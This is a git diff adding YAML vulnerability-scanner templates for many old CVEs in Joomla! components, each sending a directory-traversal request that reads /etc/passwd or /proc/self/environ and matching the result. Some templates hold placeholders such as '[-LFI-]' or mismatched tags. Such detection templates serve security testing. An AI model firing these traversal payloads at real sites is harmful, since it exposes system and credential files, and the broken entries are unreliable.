diff --git a/cves/2007/CVE-2007-4504.yml b/cves/2007/CVE-2007-4504.yml
new file mode 100644
index 0000000000..530d923bce
--- /dev/null
+++ b/cves/2007/CVE-2007-4504.yml
@@ -0,0 +1,27 @@
+id: CVE-2007-4504
+
+info:
+ name: Joomla! Component RSfiles 1.0.2 - 'path' File Download
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in index.php in the RSfiles component (com_rsfiles) 1.0.2 and earlier for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter in a files.display action.
+ reference: |
+ - https://www.exploit-db.com/exploits/4307
+ - https://www.cvedetails.com/cve/CVE-2007-4504
+ tags: cve,cve2007,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_rsfiles&task=files.display&path=..|index.php"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2008/CVE-2008-4764.yml b/cves/2008/CVE-2008-4764.yml
new file mode 100644
index 0000000000..33cee1d111
--- /dev/null
+++ b/cves/2008/CVE-2008-4764.yml
@@ -0,0 +1,27 @@
+id: CVE-2008-4764
+
+info:
+ name: Joomla! Component com_extplorer 2.0.0 RC2 - Directory Traversal
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the eXtplorer module (com_extplorer) 2.0.0 RC2 and earlier in Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dir parameter in a show_error action.
+ reference: |
+ - https://www.exploit-db.com/exploits/5435
+ - https://www.cvedetails.com/cve/CVE-2008-4764
+ tags: cve,cve2008,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2008/CVE-2008-6080.yml b/cves/2008/CVE-2008-6080.yml
new file mode 100644
index 0000000000..0fe05fb3b6
--- /dev/null
+++ b/cves/2008/CVE-2008-6080.yml
@@ -0,0 +1,27 @@
+id: CVE-2008-6080
+
+info:
+ name: Joomla! Component ionFiles 4.4.2 - File Disclosure
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in download.php in the ionFiles (com_ionfiles) 4.4.2 component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
+ reference: |
+ - https://www.exploit-db.com/exploits/6809
+ - https://www.cvedetails.com/cve/CVE-2008-6080
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2008/CVE-2008-6222.yml b/cves/2008/CVE-2008-6222.yml
new file mode 100644
index 0000000000..5e11c820df
--- /dev/null
+++ b/cves/2008/CVE-2008-6222.yml
@@ -0,0 +1,27 @@
+id: CVE-2008-6222
+
+info:
+ name: Joomla! Component ProDesk 1.0/1.2 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the Pro Desk Support Center (com_pro_desk) component 1.0 and 1.2 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the include_file parameter to index.php.
+ reference: |
+ - https://www.exploit-db.com/exploits/6980
+ - https://www.cvedetails.com/cve/CVE-2008-6222
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2009/CVE-2009-1496.yml b/cves/2009/CVE-2009-1496.yml
new file mode 100644
index 0000000000..9944f21d49
--- /dev/null
+++ b/cves/2009/CVE-2009-1496.yml
@@ -0,0 +1,27 @@
+id: CVE-2009-1496
+
+info:
+ name: Joomla! Component Cmimarketplace - 'viewit' Directory Traversal
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the Cmi Marketplace (com_cmimarketplace) component 0.1 for Joomla! allows remote attackers to list arbitrary directories via a .. (dot dot) in the viewit parameter to index.php.
+ reference: |
+ - https://www.exploit-db.com/exploits/8367
+ - https://www.cvedetails.com/cve/CVE-2009-1496
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../&cid=1"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2009/CVE-2009-2015.yml b/cves/2009/CVE-2009-2015.yml
new file mode 100644
index 0000000000..c311b2f97c
--- /dev/null
+++ b/cves/2009/CVE-2009-2015.yml
@@ -0,0 +1,27 @@
+id: CVE-2009-2015
+
+info:
+ name: Joomla! Component MooFAQ (com_moofaq) - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in includes/file_includer.php in the Ideal MooFAQ (com_moofaq) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
+ reference: |
+ - https://www.exploit-db.com/exploits/8898
+ - https://www.cvedetails.com/cve/CVE-2009-2015
+ tags: cve,cve2009,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2009/CVE-2009-2100.yml b/cves/2009/CVE-2009-2100.yml
new file mode 100644
index 0000000000..ded50fcd6b
--- /dev/null
+++ b/cves/2009/CVE-2009-2100.yml
@@ -0,0 +1,27 @@
+id: CVE-2009-2100
+
+info:
+ name: Joomla! Component com_Projectfork 2.0.10 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the JoomlaPraise Projectfork (com_projectfork) component 2.0.10 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php.
+ reference: |
+ - https://www.exploit-db.com/exploits/8946
+ - https://www.cvedetails.com/cve/CVE-2009-2100
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_projectfork§ion= [-LFI-]"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2009/CVE-2009-3053.yml b/cves/2009/CVE-2009-3053.yml
new file mode 100644
index 0000000000..7d8b0146da
--- /dev/null
+++ b/cves/2009/CVE-2009-3053.yml
@@ -0,0 +1,27 @@
+id: CVE-2009-3053
+
+info:
+ name: Joomla! Component Agora 3.0.0b (com_agora) - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the Agora (com_agora) component 3.0.0b for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the action parameter to the avatars page, reachable through index.php.
+ reference: |
+ - https://www.exploit-db.com/exploits/9564
+ - https://www.cvedetails.com/cve/CVE-2009-3053
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_agora&task=profile&page=avatars&action=[-LFI-]"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2009/CVE-2009-3318.yml b/cves/2009/CVE-2009-3318.yml
new file mode 100644
index 0000000000..057db7e66e
--- /dev/null
+++ b/cves/2009/CVE-2009-3318.yml
@@ -0,0 +1,27 @@
+id: CVE-2009-3318
+
+info:
+ name: Joomla! Component com_album 1.14 - Directory Traversal
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the Roland Breedveld Album (com_album) component 1.14 for Joomla! allows remote attackers to access arbitrary directories and have unspecified other impact via a .. (dot dot) in the target parameter to index.php.
+ reference: |
+ - https://www.exploit-db.com/exploits/9706
+ - https://www.cvedetails.com/cve/CVE-2009-3318
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_album&Itemid=128&target=/../.."
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2009/CVE-2009-4202.yml b/cves/2009/CVE-2009-4202.yml
new file mode 100644
index 0000000000..c9f6c7d875
--- /dev/null
+++ b/cves/2009/CVE-2009-4202.yml
@@ -0,0 +1,27 @@
+id: CVE-2009-4202
+
+info:
+ name: Joomla! Component Omilen Photo Gallery 0.5b - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the Omilen Photo Gallery (com_omphotogallery) component Beta 0.5 for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the controller parameter to index.php.
+ reference: |
+ - https://www.exploit-db.com/exploits/8870
+ - https://www.cvedetails.com/cve/CVE-2009-4202
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_omphotogallery&controller=[-LFI-]"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2009/CVE-2009-4679.yml b/cves/2009/CVE-2009-4679.yml
new file mode 100644
index 0000000000..5311cefc3c
--- /dev/null
+++ b/cves/2009/CVE-2009-4679.yml
@@ -0,0 +1,27 @@
+id: CVE-2009-4679
+
+info:
+ name: Joomla! Component iF Portfolio Nexus - 'Controller' Remote File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the inertialFATE iF Portfolio Nexus (com_if_nexus) component 1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
+ reference: |
+ - https://www.exploit-db.com/exploits/33440
+ - https://www.cvedetails.com/cve/CVE-2009-4679
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_kif_nexus&controller=[-LFI-]"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2010/CVE-2010-0157.yml b/cves/2010/CVE-2010-0157.yml
new file mode 100644
index 0000000000..022b4550bf
--- /dev/null
+++ b/cves/2010/CVE-2010-0157.yml
@@ -0,0 +1,27 @@
+id: CVE-2010-0157
+
+info:
+ name: Joomla! Component com_biblestudy - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the Bible Study (com_biblestudy) component 6.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter in a studieslist action to index.php.
+ reference: |
+ - https://www.exploit-db.com/exploits/10943
+ - https://www.cvedetails.com/cve/CVE-2010-0157
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_biblestudy&id=1&view=studieslist&controller=[-LFI-]"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2010/CVE-2010-0467.yml b/cves/2010/CVE-2010-0467.yml
new file mode 100644
index 0000000000..563c3c96c0
--- /dev/null
+++ b/cves/2010/CVE-2010-0467.yml
@@ -0,0 +1,27 @@
+id: CVE-2010-0467
+
+info:
+ name: Joomla! Component CCNewsLetter - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the ccNewsletter (com_ccnewsletter) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a ccnewsletter action to index.php.
+ reference: |
+ - https://www.exploit-db.com/exploits/11282
+ - https://www.cvedetails.com/cve/CVE-2010-0467
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2010/CVE-2010-0696.yml b/cves/2010/CVE-2010-0696.yml
new file mode 100644
index 0000000000..db109c5d00
--- /dev/null
+++ b/cves/2010/CVE-2010-0696.yml
@@ -0,0 +1,27 @@
+id: CVE-2010-0696
+
+info:
+ name: Joomla! Component Jw_allVideos - Arbitrary File Download
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter.
+ reference: |
+ - https://www.exploit-db.com/exploits/11447
+ - https://www.cvedetails.com/cve/CVE-2010-0696
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/plugins/content/jw_allvideos/includes/download.php?file=./../.../file.php"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2010/CVE-2010-0759.yml b/cves/2010/CVE-2010-0759.yml
new file mode 100644
index 0000000000..991d5572b1
--- /dev/null
+++ b/cves/2010/CVE-2010-0759.yml
@@ -0,0 +1,27 @@
+id: CVE-2010-0759
+
+info:
+ name: Joomla! Plugin Core Design Scriptegrator - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php in the Core Design Scriptegrator plugin 1.4.1 for Joomla! allows remote attackers to read, and possibly include and execute, arbitrary files via directory traversal sequences in the files[] parameter.
+ reference: |
+ - https://www.exploit-db.com/exploits/11498
+ - https://www.cvedetails.com/cve/CVE-2010-0759
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2010/CVE-2010-0942.yml b/cves/2010/CVE-2010-0942.yml
new file mode 100644
index 0000000000..1470985d87
--- /dev/null
+++ b/cves/2010/CVE-2010-0942.yml
@@ -0,0 +1,27 @@
+id: CVE-2010-0942
+
+info:
+ name: Joomla! Component com_jvideodirect - Directory Traversal
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the jVideoDirect (com_jvideodirect) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+ reference: |
+ - https://www.exploit-db.com/exploits/11089
+ - https://www.cvedetails.com/cve/CVE-2010-0942
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2010/CVE-2010-0972.yml b/cves/2010/CVE-2010-0972.yml
new file mode 100644
index 0000000000..4c761145f4
--- /dev/null
+++ b/cves/2010/CVE-2010-0972.yml
@@ -0,0 +1,27 @@
+id: CVE-2010-0972
+
+info:
+ name: Joomla! Component com_gcalendar Suite 2.1.5 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the GCalendar (com_gcalendar) component 2.1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
+ reference: |
+ - https://www.exploit-db.com/exploits/11738
+ - https://www.cvedetails.com/cve/CVE-2010-0972
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2010/CVE-2010-0982.yml b/cves/2010/CVE-2010-0982.yml
new file mode 100644
index 0000000000..0c398588a0
--- /dev/null
+++ b/cves/2010/CVE-2010-0982.yml
@@ -0,0 +1,27 @@
+id: CVE-2010-0982
+
+info:
+ name: Joomla! Component com_cartweberp - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+ reference: |
+ - https://www.exploit-db.com/exploits/10942
+ - https://www.cvedetails.com/cve/CVE-2010-0982
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_cartweberp&controller=[-LFI-]"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2010/CVE-2010-1056.yml b/cves/2010/CVE-2010-1056.yml
new file mode 100644
index 0000000000..104d6ccc3d
--- /dev/null
+++ b/cves/2010/CVE-2010-1056.yml
@@ -0,0 +1,27 @@
+id: CVE-2010-1056
+
+info:
+ name: Joomla! Component com_rokdownloads - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
+ reference: |
+ - https://www.exploit-db.com/exploits/11760
+ - https://www.cvedetails.com/cve/CVE-2010-1056
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2010/CVE-2010-1081.yml b/cves/2010/CVE-2010-1081.yml
new file mode 100644
index 0000000000..4c4670d529
--- /dev/null
+++ b/cves/2010/CVE-2010-1081.yml
@@ -0,0 +1,27 @@
+id: CVE-2010-1081
+
+info:
+ name: Joomla! Component com_communitypolls 1.5.2 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the Community Polls (com_communitypolls) component 1.5.2, and possibly earlier, for Core Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+ reference: |
+ - https://www.exploit-db.com/exploits/11511
+ - https://www.cvedetails.com/cve/CVE-2010-1081
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2010/CVE-2010-1217.yml b/cves/2010/CVE-2010-1217.yml
new file mode 100644
index 0000000000..0c3d2b0c26
--- /dev/null
+++ b/cves/2010/CVE-2010-1217.yml
@@ -0,0 +1,27 @@
+id: CVE-2010-1217
+
+info:
+ name: Joomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the JE Form Creator (com_jeformcr) component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via directory traversal sequences in the view parameter to index.php. NOTE: the original researcher states that the affected product is JE Tooltip, not Form Creator; however, the exploit URL suggests that Form Creator is affected.
+ reference: |
+ - https://www.exploit-db.com/exploits/11814
+ - https://www.cvedetails.com/cve/CVE-2010-1217
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_jeformcr&view={LFI}%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2010/CVE-2010-1302.yml b/cves/2010/CVE-2010-1302.yml
new file mode 100644
index 0000000000..e3e0f264d3
--- /dev/null
+++ b/cves/2010/CVE-2010-1302.yml
@@ -0,0 +1,27 @@
+id: CVE-2010-1302
+
+info:
+ name: Joomla! Component DW Graph - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in dwgraphs.php in the DecryptWeb DW Graphs (com_dwgraphs) component 1.0 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
+ reference: |
+ - https://www.exploit-db.com/exploits/11978
+ - https://www.cvedetails.com/cve/CVE-2010-1302
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_dwgraphs&controller={lfi}%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2010/CVE-2010-1340.yml b/cves/2010/CVE-2010-1340.yml
new file mode 100644
index 0000000000..16e7ca875a
--- /dev/null
+++ b/cves/2010/CVE-2010-1340.yml
@@ -0,0 +1,27 @@
+id: CVE-2010-1340
+
+info:
+ name: Joomla! Component com_jresearch - 'Controller' Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in jresearch.php in the J!Research (com_jresearch) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+ reference: |
+ - https://www.exploit-db.com/exploits/33797
+ - https://www.cvedetails.com/cve/CVE-2010-1340
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_jresearch&controller=../../../../../../../../../../proc/self/environ%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2010/CVE-2010-1461.yml b/cves/2010/CVE-2010-1461.yml
new file mode 100644
index 0000000000..13660c3ae8
--- /dev/null
+++ b/cves/2010/CVE-2010-1461.yml
@@ -0,0 +1,27 @@
+id: CVE-2010-1461
+
+info:
+ name: Joomla! Component Photo Battle 1.0.1 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the Photo Battle (com_photobattle) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via the view parameter to index.php.
+ reference: |
+ - https://www.exploit-db.com/exploits/12232
+ - https://www.cvedetails.com/cve/CVE-2010-1461
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2010/CVE-2010-1469.yml b/cves/2010/CVE-2010-1469.yml
new file mode 100644
index 0000000000..d06c195c18
--- /dev/null
+++ b/cves/2010/CVE-2010-1469.yml
@@ -0,0 +1,27 @@
+id: CVE-2010-1469
+
+info:
+ name: Joomla! Component JProject Manager 1.0 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the Ternaria Informatica JProject Manager (com_jprojectmanager) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
+ reference: |
+ - https://www.exploit-db.com/exploits/12146
+ - https://www.cvedetails.com/cve/CVE-2010-1469
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2010/CVE-2010-1478.yml b/cves/2010/CVE-2010-1478.yml
new file mode 100644
index 0000000000..850f9aa938
--- /dev/null
+++ b/cves/2010/CVE-2010-1478.yml
@@ -0,0 +1,27 @@
+id: CVE-2010-1478
+
+info:
+ name: Joomla! Component Jfeedback 1.2 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the Ternaria Informatica Jfeedback! (com_jfeedback) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
+ reference: |
+ - https://www.exploit-db.com/exploits/12145
+ - https://www.cvedetails.com/cve/CVE-2010-1478
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_jfeedback&controller=../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2010/CVE-2010-1491.yml b/cves/2010/CVE-2010-1491.yml
new file mode 100644
index 0000000000..d247b95fe5
--- /dev/null
+++ b/cves/2010/CVE-2010-1491.yml
@@ -0,0 +1,27 @@
+id: CVE-2010-1491
+
+info:
+ name: Joomla! Component MMS Blog 2.3.0 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the MMS Blog (com_mmsblog) component 2.3.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
+ reference: |
+ - https://www.exploit-db.com/exploits/12318
+ - https://www.cvedetails.com/cve/CVE-2010-1491
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_mmsblog&controller=../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2010/CVE-2010-1540.yml b/cves/2010/CVE-2010-1540.yml
new file mode 100644
index 0000000000..b0afe05f6e
--- /dev/null
+++ b/cves/2010/CVE-2010-1540.yml
@@ -0,0 +1,27 @@
+id: CVE-2010-1540
+
+info:
+ name: Joomla! Component com_blog - Directory Traversal
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in index.php in the MyBlog (com_myblog) component 3.0.329 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the task parameter.
+ reference: |
+ - https://www.exploit-db.com/exploits/11625
+ - https://www.cvedetails.com/cve/CVE-2010-1540
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2010/CVE-2010-1603.yml b/cves/2010/CVE-2010-1603.yml
new file mode 100644
index 0000000000..dc2b52c09b
--- /dev/null
+++ b/cves/2010/CVE-2010-1603.yml
@@ -0,0 +1,27 @@
+id: CVE-2010-1603
+
+info:
+ name: Joomla! Component ZiMBCore 0.1 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the ZiMB Core (aka ZiMBCore or com_zimbcore) component 0.1 in the ZiMB Manager collection for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12284
+ - https://www.cvedetails.com/cve/CVE-2010-1603
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_zimbcore&controller=../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2010/CVE-2010-1653.yml b/cves/2010/CVE-2010-1653.yml
new file mode 100644
index 0000000000..4313ef2ea4
--- /dev/null
+++ b/cves/2010/CVE-2010-1653.yml
@@ -0,0 +1,27 @@
+id: CVE-2010-1653
+
+info:
+ name: Joomla! Component Graphics 1.0.6 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in graphics.php in the Graphics (com_graphics) component 1.0.6 and 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. NOTE: some of these details are obtained from third party information.
+ reference: |
+ - https://www.exploit-db.com/exploits/12430
